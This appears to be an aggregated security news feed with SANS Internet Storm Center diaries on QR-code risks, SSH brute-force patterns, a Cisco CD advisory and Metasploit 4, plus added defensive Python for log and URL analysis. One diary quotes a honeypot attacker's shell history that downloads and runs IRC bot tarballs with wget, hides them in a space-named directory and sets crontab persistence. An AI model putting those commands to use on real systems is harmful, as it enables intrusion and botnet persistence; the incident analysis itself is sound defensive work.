Security product provider Rapid7 has updated its widely used open-source Metasploit exploitation framework, expanding the software so it supports enterprise IT security staff as well as its core audience of penetration testers.

Intel is opening up two research centers at Carnegie Mellon university that will develop technology around delivery of real-time information to consumer electronics aggregated from millions of cloud sources, the company said on Wednesday.

When hackers broke into Google's computer network nearly two years ago, their first step was to take over Microsoft Windows machines running in the company's China offices. Would Google have been better off had those workers been running the Mac?

Google chief legal officer David Drummond Wednesday issued a stinging rebuke of what he called 'bogus patent' attacks on the Android operating system by major competitors like Apple, Oracle and Microsoft.

A $66.6 million Oracle ERP project undertaken by Pennsylvania's Liquor Control Board has been marred by inflated costs, staffing woes and operational problems, according to the state's auditor general.

I just wrote a quick note about the Cisco warranty CD mixup. While writing that, it came to me that quite a few of our readers may currently be visiting Las Vegas for this summer's security drink fest. Historically, this has been a time to play various pranks on the audience of these conferences. In the past, fake ATMs, odd wifi networks, weird BGP issues and other tricks were mentioned.
One thing to look out for this year may be QR codes. 25% of internet users are now apparently using mobile devices. Many of them have known vulnerabilities the owner didn't bother to patch yet. At Vegas this week, you may prefer using your mobile device via 3G networks to avoid the notoriously unsafe Wifi networks offered at these conferences.
But there is one problem with mobile devices: the keyboard typically stinks, in particular on cell phones. To help you with that, we have QR codes. QR codes are bar codes that encode text and are commonly understood by mobile devices. Take a picture of one, and an app will take you to the encoded URL. Sadly, most people are not all that good at reading barcodes, and have no idea what they are entering. Compare it to handing your phone to a friend and telling them to type for you.
These barcodes can link directly to browser exploits, or could include other malicious content to manipulate your phone. If you spot a malicious code, let us know ... most of the applications will tell you what URL they are going to open up before they actually load it (similar to some of the short URL services).

Cisco released a somewhat unusual advisory today [1]. Instead of talking about a vulnerability in a Cisco product, the advisory warns of a CD shipped by Cisco between December 2010 and August 2011 (i.e., now).
The CD itself does not include any malware, but documents on the CD, if opened in a browser, may include content from known malicious sites and could have led to exploitation of the user.
According to Cisco, the site in question has been down for some time, and they are not aware of Cisco customers being affected by content from the malicious site. But with all the talk about malicious USB sticks, and people focusing countermeasures on preventing the use of unauthorized USB sticks, CDs/DVDs certainly should be considered too.
If you are in Vegas this week for Blackhat/Defcon: be on the lookout for certified pre-pw0n3d vendor software distributed on USB sticks or CDs. (Or QR codes? Maybe I should do a diary about that.)
[1] http://www.cisco.com/warp/public/707/cisco-sr-20110803-cd.shtml
------

In what may be a preview of what will happen in the United States, the Australian telecommunications giant Telstra late last month released its plan to bring a close to the old telephone world. Telstra announced it will decommission its copper customer access network and stop offering fixed line telephone service to retail customers after July 1, 2018.

Hacker groups such as Anonymous and Lulz Security may need to be monitored more closely in the event they are assisted by other hackers with higher skill levels and decide to strike critical infrastructure.

Thanks to Pat for pointing out a sharp increase in the number of sources scanning for port 3389 [1].
Port 3389/TCP is used by Microsoft Terminal Services, and has been a continuing target of attacks. If you have any logs you want to share, please submit them via our contact page, in particular if you observed anything different over the last couple of days.

Security vendor McAfee published a detailed report on Tuesday about a hacking group that penetrated 72 companies and organizations in 14 countries since 2006 in a massive operation that stole national secrets, business plans and other sensitive information.

Before the Internet, passwords played only a tiny role in everyday life. Think about it: Except for your ATM PIN, what important codes did you need to remember? Probably none. But now, you can’t click a link without hitting another site that requires a password. Doesn’t matter if it’s a big-name destination like Google Docs or Mint.com, or a smaller, more private site such as your local library or company intranet. You want in? Password, please.

Maxthon (free) is probably the best Web browser you've never heard of. I reviewed it favorably in the past, when it resembled a cousin of Internet Explorer 7. Since then, it's changed drastically. Maxthon includes two built-in rendering engines, Webkit and Trident, and you can switch between them with a click, which means no website should be incompatible when browsing. One of the best uses for this is to visit ancient sites (like for work) that only work with Internet Explorer.

Industry observers say that a stagnant laptop market could be reinvigorated by the energy-efficient ARM chips that power today's tablets. What do you think? Will ARM chips provide a shot in the arm to laptop sales, or has the post-PC era already arrived?

LAS VEGAS -- Not only are SCADA systems used to run power plants and other
critical infrastructure lacking many security precautions to keep hackers out,
operators sometimes practically advertise their wares on Google search,
according to a demo today during a Black Hat conference...

The Department of Defense has released its long-awaited "Department of
Defense Strategy for Operating in Cyberspace" [PDF], as well as a
website devoted to selling that strategy. The strategy has faced no
shortage of criticism over the last couple weeks, from VCJS Gen....

Documents containing personal information of approximately 1,500
Mills-Peninsula Health Services patients were removed from the facility
over the course of a year and taken home by a mailroom employee,
according to a hospital spokeswoman.

The worker, who has since been terminated, took the documents between
November 2009 and...

./run
We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren't any traces in the shell history file that would tell us either way.
In any case, Phase #3a follows: the attacker installs some goodies. virus.tar isn't really a virus, it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses Nano to edit the config file, which tells us that he isn't all that experienced on Unix. A real Unix hacker would most likely use vi, because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet
wget http://f......com/storm12/virus.tar
tar xvf virus.tar
rm -rf virus.tar
cd virus
ls -a
nano start
nano inst
chmod +x *
./autorun
./start Evolution
Phase #3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called " " (a single space). If you want to search for such directories on your system, try this:

# find / -name " "

mkdir " "
cd " "
ls -a
wget http://c.......org/egg.tgz
cd
tar zxvf egg.tgz
rm -rf egg.tgz
cd .access.log
ls -a
chmod +x *
./eggdrop -m bot1.conf
ls -a
cd scripts
nano respond.tcl
pwd

Phase #4: The attacker wants to make sure that access can be re-gained, and configures the crontab to re-start some of his processes automatically on a schedule.
crontab -l
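
The artefacts the three phases leave behind (a whitespace-only directory name, a hidden directory named like a log file, executables inside it, and a crontab entry that restarts them) can be hunted with a small script. The following Python is an added example, not part of the diary: it builds a throwaway directory tree and a crontab modelled on the history above (both constructed, not the honeypot's data) and then looks for exactly those patterns.

```python
import os
import shutil
import stat
import tempfile


def suspicious_paths(root):
    """Walk `root` and return (path, reason) pairs for the artefacts seen in the history:
    whitespace-only names, hidden directories named like log files, and executables
    living under either of those."""
    hits = []
    flagged_dirs = set()
    for dirpath, dirnames, filenames in os.walk(root):      # top-down: parents before children
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            if name.strip() == "":
                reason = "whitespace-only name"
            elif name.startswith(".") and name.endswith(".log") and os.path.isdir(full):
                reason = "hidden directory posing as a log file"
            else:
                continue
            hits.append((full, reason))
            if os.path.isdir(full):
                flagged_dirs.add(full)
        # anything executable below a flagged directory is worth a look too
        if any(dirpath == d or dirpath.startswith(d + os.sep) for d in flagged_dirs):
            for name in filenames:
                full = os.path.join(dirpath, name)
                if os.stat(full).st_mode & stat.S_IXUSR:
                    hits.append((full, "executable inside a suspicious directory"))
    return hits


def crontab_references(crontab_text, known_paths=()):
    """Return crontab lines whose command touches a known suspicious path, a hidden
    path component, or a whitespace-only path component (Phase #4 persistence)."""
    flagged = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or "=" in line.split(None, 1)[0]:
            continue                                    # comments and VAR=value lines
        n = 1 if line.startswith("@") else 5            # @reboot-style entries have one time field
        parts = line.split(None, n)
        if len(parts) <= n:
            continue
        cmd = parts[n]
        if "/." in cmd or "/ /" in cmd or any(p in cmd for p in known_paths):
            flagged.append(line)
    return flagged


def build_demo_tree():
    """Construct a throwaway tree mirroring the history above (constructed sample, not real data)."""
    root = tempfile.mkdtemp(prefix="isc_diary_demo_")
    bot_dir = os.path.join(root, " ", ".access.log")
    os.makedirs(os.path.join(bot_dir, "scripts"))
    os.makedirs(os.path.join(root, "virus"))
    for rel in ((" ", ".access.log", "eggdrop"), ("virus", "start"), ("virus", "autorun")):
        path = os.path.join(root, *rel)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, 0o755)
    with open(os.path.join(bot_dir, "bot1.conf"), "w") as fh:
        fh.write("# constructed bot config\n")
    return root


def demo_crontab(root):
    """Constructed crontab text modelled on Phase #4."""
    return (
        "# constructed sample crontab\n"
        f"0 * * * * {root}/virus/start Evolution\n"
        f'*/10 * * * * cd "{root}/ /.access.log" && ./eggdrop -m bot1.conf\n'
        "0 3 * * * /usr/bin/updatedb\n"
    )


if __name__ == "__main__":
    root = build_demo_tree()
    try:
        hits = suspicious_paths(root)
        for path, reason in hits:
            print(f"{reason}: {path!r}")
        for line in crontab_references(demo_crontab(root), {p for p, _ in hits}):
            print("crontab:", line)
    finally:
        shutil.rmtree(root)
```

Note that the plainly named virus directory is not caught by the name heuristics and its crontab line is not flagged either; name-based hunting only finds what tries to hide, so pair it with a review of every crontab entry and of recently created executables.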

We received an email from a reader today about a link on his wife's Facebook wall. The link indicated that a friend had tagged her. When he tried to remove the post from her wall it would not allow removal. He reported it as spam. Apparently a friend of hers clicked on the link and got infected. The links point to bitlyDOTcom and have random file names. Let this serve as a reminder to everyone not to click on links until you have checked out the source. As for Bitly, I would use extreme caution with any links identified as source bitlyDOTcom. This is a website redirector that allows the link to be shortened, shared and tracked. Even if you don't get malicious programs installed, do you really want to be tracked?
Thanks to our reader Paul for the email reminder and information.
Deb Hale
(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
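
Both the QR code diary above and this one come down to the same advice: look at the URL before anything opens it. The following Python is an added example, not code from either diary; it takes the text a QR reader decoded (or a pasted link), parses it without fetching anything, and lists the things a person would want to notice first: a non-web scheme, a bare IP address, a username-before-host trick, punycode, or a shortener such as bit.ly that hides the destination and tracks the click. The SHORTENERS list is an assumption to extend for your own environment.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed list of common URL shorteners (assumption; extend as needed).
SHORTENERS = {"bit.ly", "bitly.com", "j.mp", "tinyurl.com", "goo.gl", "t.co", "is.gd", "ow.ly"}


def inspect_url(text):
    """Pre-flight check of a decoded QR payload or pasted link.

    Returns the parsed pieces plus a list of warning strings. Nothing is fetched;
    this is the look-before-you-open step that most QR apps give the user."""
    text = text.strip()
    warnings = []
    parts = urlsplit(text)
    scheme = parts.scheme.lower()
    if not scheme:
        # QR payloads are often bare hostnames; parse them as http, but say so
        parts = urlsplit("http://" + text)
        scheme = "http"
        warnings.append("no scheme given; the app would guess http")
    if scheme not in ("http", "https"):
        warnings.append(f"non-web scheme '{scheme}' (tel:, sms:, market:, ... can trigger actions)")
    host = (parts.hostname or "").lower()
    if parts.username is not None:
        warnings.append(f"userinfo before host: '{parts.username}@' hides the real host")
    try:
        ipaddress.ip_address(host)
        warnings.append("host is a bare IP address")
    except ValueError:
        pass                                    # ordinary hostname (or none at all)
    if host.startswith("xn--") or ".xn--" in host:
        warnings.append("punycode label in host (possible homograph)")
    if host in SHORTENERS or any(host.endswith("." + s) for s in SHORTENERS):
        warnings.append("URL shortener: final destination and tracking not visible")
    if host.count(".") >= 4:
        warnings.append("many subdomain labels; check the registrable domain")
    return {"scheme": scheme, "host": host, "path": parts.path, "warnings": warnings}


if __name__ == "__main__":
    # Constructed payloads, not codes seen in the wild.
    for sample in ("https://isc.sans.org/", "http://bit.ly/3x4mpl3",
                   "http://paypal.com@192.0.2.1/login", "tel:+15555550100"):
        result = inspect_url(sample)
        print(sample, "->", result["host"] or "(no host)", result["warnings"])
```

A shortener can only be resolved by following its redirect, which is the one thing the check above refuses to do; if you must know where a bit.ly link goes, ask the shortener's preview feature rather than loading it on the phone.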

On Friday an article appeared on techdirt.com claiming that Pakistan is trying to ban encryption under their new Telco law. In the article the author suggests that encryption is really just a form of speech and that trying to ban encryption is like trying to ban language.

I find the banning of encryption interesting in light of the number of United States compliance standards and laws governing the use of encryption to protect financial data (PCI) and medical records (HIPAA) among them. These laws require that the data be protected in place and in transit. Does the proposed Telco Law in Pakistan mean that the US will not be able to exchange data with them? How will laws like this affect world trade?

All of the work that has been done to establish a world economy could come crashing down if laws like this stand. It will be interesting to see how this develops. Many businesses today operate on the Internet, and many are moving to the cloud. These businesses and organizations need to protect their data to protect their financial stability. So in this Handler's opinion, banning encryption will never happen. Others may not agree with me. Let me hear from you. Can we or should we ban encryption?

When Lion first appeared in the Apple App Store, most of us probably blindly clicked YES YES YES like good little Apple zombies (me included!)... After some updates and fiddling with applications to get them working, I started to take a hard look at what was now leaving my devices. A new series of packets on port TCP 5223 was leaving outbound from my network stack, and thanks to Little Snitch [1] I was in control of it.

On Apple's support site [2] you will find a list of well-known TCP/UDP ports used by Apple operating systems, and according to their site:

We all know that web applications are the new firewall. However, so far we have had a hard time collecting web application logs. The hard part is balancing ease of installing a sensor (without disrupting the web application), the fidelity of the log information, and privacy.
With firewall logs, it is pretty simple. A rejected packet in a firewall has very little information and privacy isn't a big issue. Web applications are different, as the actual meat of the log event is in the request content, which may contain personal information. Parsing web logs isn't so easy either: administrators frequently customize log formats for special purposes.
To balance these different issues we decided to focus on errors, but instead of parsing logs, we set up a little PHP script that you can add to your error page. In its current form, the script will work with PHP web servers (tested with Apache) that support the curl extension. Curl is installed by default in current versions of PHP.
Now all you need is an error page. In Apache, just use the ErrorDocument configuration directive. For example:

ErrorDocument 404 /error.html

will redirect users to /error.html in case of a 404 error [1]. You may already have a page like that configured. All you need to do is add the PHP snippet to the end, sending us the intended URL, the user agent and the IP address of the client accessing the missing page.
The hope is to collect data from automated probes, similar to how DShield's firewall logs reflect portscan activity.
In particular if you are running a personal/home web server: please consider adding the collector script.
Once we get a few submitters, we will start adding continuously updated reports to the site, just like we do for the DShield data. However, we can't do this until we have at least a dozen submitters (better 100 or more). We cannot publish one-off errors, as they will likely be specific to your site and again could cause privacy issues.
Why do we only support PHP? Well, that's the language I know. Feel free to submit a .Net/Java/Ruby/Perl or whatever version of the script.
Simple steps to sign up:
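
To show what such an error-page collector submits, and how to keep personal data out of it, here is an added example written in Python rather than the diary's PHP; it is not the ISC's script. It reads the REDIRECT_STATUS, REDIRECT_URL and REDIRECT_QUERY_STRING variables that Apache sets when an ErrorDocument handler runs, keeps query parameter names but drops their values (values are where e-mail addresses and tokens end up), and posts the record to a placeholder collector URL. COLLECTOR_URL and the sensor id are assumptions, not the real submission endpoint.

```python
import json
import urllib.request
from urllib.parse import parse_qsl, urlsplit

# Placeholder endpoint (assumption); the real collector address comes from the sign-up steps.
COLLECTOR_URL = "https://collector.example.invalid/submit"


def scrub_target(uri):
    """Keep path and parameter *names*, drop parameter values.

    /setup.php?user=bob%40example.com&token=abc  ->  /setup.php?user&token
    The probe's intent (which script it looked for) survives; personal data does not."""
    parts = urlsplit(uri)
    names = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    scrubbed = parts.path
    if names:
        scrubbed += "?" + "&".join(names)
    return scrubbed


def build_report(env, sensor_id):
    """`env` is the CGI/WSGI-style environment Apache hands an ErrorDocument handler.

    Returns the record to submit, or None when the handler was not reached via a
    4xx error (nothing to report for ordinary or server-side failures)."""
    status = env.get("REDIRECT_STATUS", "")
    if not status.startswith("4"):
        return None
    url = env.get("REDIRECT_URL", "")               # requested path, query string kept separately
    qs = env.get("REDIRECT_QUERY_STRING", "")
    target = scrub_target(url + ("?" + qs if qs else ""))
    return {
        "sensor": sensor_id,
        "status": status,
        "url": target[:512],                        # cap sizes so a junk request cannot bloat the report
        "user_agent": env.get("HTTP_USER_AGENT", "")[:256],
        "client_ip": env.get("REMOTE_ADDR", ""),
    }


def submit(report, timeout=5):
    """POST the report as JSON; returns the HTTP status from the collector."""
    data = json.dumps(report).encode()
    req = urllib.request.Request(COLLECTOR_URL, data=data,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


if __name__ == "__main__":
    # Constructed environment, as a 404 handler would see it for a probe of a missing admin script.
    demo_env = {
        "REDIRECT_STATUS": "404",
        "REDIRECT_URL": "/phpmyadmin/scripts/setup.php",
        "REDIRECT_QUERY_STRING": "user=bob%40example.com&token=abc",
        "HTTP_USER_AGENT": "ConstructedScanner/1.0",
        "REMOTE_ADDR": "192.0.2.10",
    }
    print(json.dumps(build_report(demo_env, "sensor-demo"), indent=2))
```

Keep the submission off the request's critical path (a short timeout, and ignore failures) so a slow or unreachable collector never turns a 404 page into a hang for the visitor.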

Citrix has identified a vulnerability in XenApp and XenDesktop which could potentially be exploited by sending a well-crafted packet to the vulnerable XML component. The code will run with the privileges of the service.
Citrix has posted a list of versions vulnerable to this issue with the hotfixes available here.
[1] http://support.citrix.com/article/CTX129430

A little while ago I asked for some SSH logs and as per usual people responded with gusto. So first of all thanks to all of those that provided logs, it was very much appreciated. Looking through the data it does look like everything is pretty much the same as usual. Get a userid, guess with password1, password2, password3, etc.

One variation did show up. One of the log files showed that instead of the password changing, the userid was changed. So pick a password and try it with userid1, userid2, userid3, etc., then pick password2 and rinse, lather and repeat. Some of the other log files may have shown the same, but not all log files had userids and passwords available.

A number of the IP addresses showed that they were using the same password list, indicating that either they were being generated by the same tool or might be part of the same botnet. Quite a few IP addresses showed up in different logs submitted.

The most common userids were, not unexpectedly, root, admin, administrator, mysql, oracle, nagios. A few more specific userids do creep in, but most are the standard ones.

So not earth shattering or even mildly surprising, but sometimes it is good to know that things haven't changed, much.

As for the attacking IPs: you can find the unique IP addresses performing SSH attacks here: http://www.shearwater.com.au/uploads/files/MH/SSH_attacking_IPs.txt
A number of the logs were provided by the kippo SSH honeypot, which looks like it is well worth running if you want to collect your own info.
Thanks again, and if I manage to dig out anything further I'll keep you up to date.
Mark
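
The two iteration orders described above (fixed user, varying password versus fixed password, varying user) and the shared password lists are easy to tell apart mechanically once attempts are grouped by source. The following Python is an added example, not part of the diary or of the kippo project: it parses a constructed, simplified "login attempt [user/password]" line format (not kippo's exact log layout) and reports, per source, which order the attacker iterates in and which sources share an identical password sequence.

```python
import re
from collections import defaultdict

# Simplified, constructed line format: "<date> <time> <ip> login attempt [user/password] failed"
LINE_RE = re.compile(
    r"^(\S+ \S+) (\d+\.\d+\.\d+\.\d+) login attempt \[([^/\]]*)/([^\]]*)\] (failed|succeeded)$"
)

# Constructed sample log: .7 and .44 walk a password list per user (and share the list),
# .9 sprays one password across many userids before moving to the next password.
SAMPLE_LOG = """\
2011-08-01 10:00:01 198.51.100.7 login attempt [root/password1] failed
2011-08-01 10:00:02 198.51.100.7 login attempt [root/password2] failed
2011-08-01 10:00:03 198.51.100.7 login attempt [root/password3] failed
2011-08-01 10:00:04 198.51.100.7 login attempt [admin/password1] failed
2011-08-01 10:00:05 198.51.100.7 login attempt [admin/password2] failed
2011-08-01 10:00:06 198.51.100.7 login attempt [admin/password3] failed
2011-08-01 11:00:01 203.0.113.9 login attempt [root/password1] failed
2011-08-01 11:00:02 203.0.113.9 login attempt [admin/password1] failed
2011-08-01 11:00:03 203.0.113.9 login attempt [mysql/password1] failed
2011-08-01 11:00:04 203.0.113.9 login attempt [oracle/password1] failed
2011-08-01 11:00:05 203.0.113.9 login attempt [nagios/password1] failed
2011-08-01 11:00:06 203.0.113.9 login attempt [root/password2] failed
2011-08-01 11:00:07 203.0.113.9 login attempt [admin/password2] failed
2011-08-01 12:00:01 192.0.2.44 login attempt [root/password1] failed
2011-08-01 12:00:02 192.0.2.44 login attempt [root/password2] failed
2011-08-01 12:00:03 192.0.2.44 login attempt [root/password3] failed
2011-08-01 12:00:04 192.0.2.44 login attempt [admin/password1] failed
2011-08-01 12:00:05 192.0.2.44 login attempt [admin/password2] failed
2011-08-01 12:00:06 192.0.2.44 login attempt [admin/password3] failed
"""


def parse(log_text):
    """Group (user, password) attempts by source IP, in log order.
    Passwords containing '/' are not handled by this simplified pattern."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            _, src, user, pw, _ = m.groups()
            by_src[src].append((user, pw))
    return by_src


def classify(attempts):
    """Describe the attacker's iteration order from consecutive attempts:
    does the userid stay fixed while passwords change, or the other way round?"""
    if len(attempts) < 4:
        return "too few attempts"
    pairs = list(zip(attempts, attempts[1:]))
    same_user = sum(1 for a, b in pairs if a[0] == b[0])
    same_pw = sum(1 for a, b in pairs if a[1] == b[1])
    if same_user > same_pw:
        return "password guessing (fixed user, varying password)"
    if same_pw > same_user:
        return "user spraying (fixed password, varying user)"
    return "mixed"


def password_list_signature(attempts):
    """Distinct passwords in first-seen order; sources sharing a signature
    most likely run the same tool or wordlist."""
    seen = []
    for _, pw in attempts:
        if pw not in seen:
            seen.append(pw)
    return tuple(seen)


def analyse(log_text):
    """Return ({source: verdict}, {password_signature: [sources sharing it]})."""
    by_src = parse(log_text)
    verdicts = {src: classify(a) for src, a in by_src.items()}
    groups = defaultdict(list)
    for src, a in by_src.items():
        groups[password_list_signature(a)].append(src)
    shared = {sig: srcs for sig, srcs in groups.items() if len(srcs) > 1}
    return verdicts, shared


if __name__ == "__main__":
    verdicts, shared = analyse(SAMPLE_LOG)
    for src, verdict in verdicts.items():
        print(f"{src:15} {verdict}")
    for sig, srcs in shared.items():
        print("shared password list", sig, "used by", srcs)
```

The spraying verdict is the one that matters operationally: per-account lockout thresholds never trip when each userid sees only one or two attempts, so detection for that pattern has to count attempts per source, not per account.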

One of my favourite tools has to be Metasploit and version 4 has been released and is available for download.
Updating an existing instance is a cinch: just run msfupdate or SVN and you should be good to go. Alternatively you can get fresh install files from the Metasploit web site. More info here -- https://community.rapid7.com/community/metasploit/blog/2011/08/01/metasploit-40-released?utm_source=feedburnerutm_medium=feedutm_campaign=Feed%3A+metasploit%2Fblog+%28Metasploit+Blog%29
Enjoy.

Over the past year, the median cost of cybercrime increased by 56%, and
now costs companies an average of $6 million per year.

That finding comes from Ponemon Institute, which on Tuesday released its
Second Annual Cost of Cyber Crime Study, sponsored by HP ArcSight. For
the study, Ponemon questioned 50 U.S.-based businesses,...